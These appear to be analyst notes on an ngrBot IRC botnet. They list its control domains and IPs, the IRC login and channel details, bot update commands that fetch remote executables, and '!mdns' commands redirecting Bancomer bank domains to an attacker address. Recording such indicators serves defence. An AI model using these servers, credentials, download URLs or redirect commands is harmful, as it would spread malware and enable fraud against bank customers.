Domain names used to control the botnet:
hdp.zapto.org 46.166.141.149 active
1n1.sytes.net 213.155.7.39 active
hdp.zapto.org not active
hgjma1.biz not active
jma1.biz not active
mooo.com 72.8.150.1 active
n1.mooo.com 86.35.19.116 active
fhdp.zapto.org
Remote Host Port Number
199.15.234.7 80
50.22.107.93 80
213.155.7.39 2009 PASS ngr
NICK n{US|XPa}dcbcoox
USER dcbcoox 0 0 :dcbcoox
JOIN #juaz ngrBot
PRIVMSG #juaz :[d=”http://creatucurso.net/facu/mx.exe” s=”198683 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataXdxaxx.exe” – Download retries: 0
C&C Server: 213.155.7.39:2009
Server Password:
Username: ibsgpzz
Nickname: n{DE|XPa}ibsgpzz
Channel: #cocl (Password: ngrBot)
Channeltopic: :!up http://creatucurso.net/facu/co.exe 8a7b3d74dc8d09472b021567ecc6494a
Update:
Now talking in #juaz
Topic On: [ #juaz ] [ !up http://spaciografico.com/rot/bien.exe d1a976da7dc7ddbf20e005b3e4277e8e ]
Topic By: [ o0o ]
(o0o) !mdns www.bancomer.com 46.166.148.144 !mdns www.bancomer.com.mx 46.166.148.144 !mdns bancomer.com 46.166.148.144 !mdns bancomer.com.mx 46.166.148.144
ChanMode: o0o sets mode [-smtMu]
hosting infos:
http://whois.domaintools.com/213.155.7.39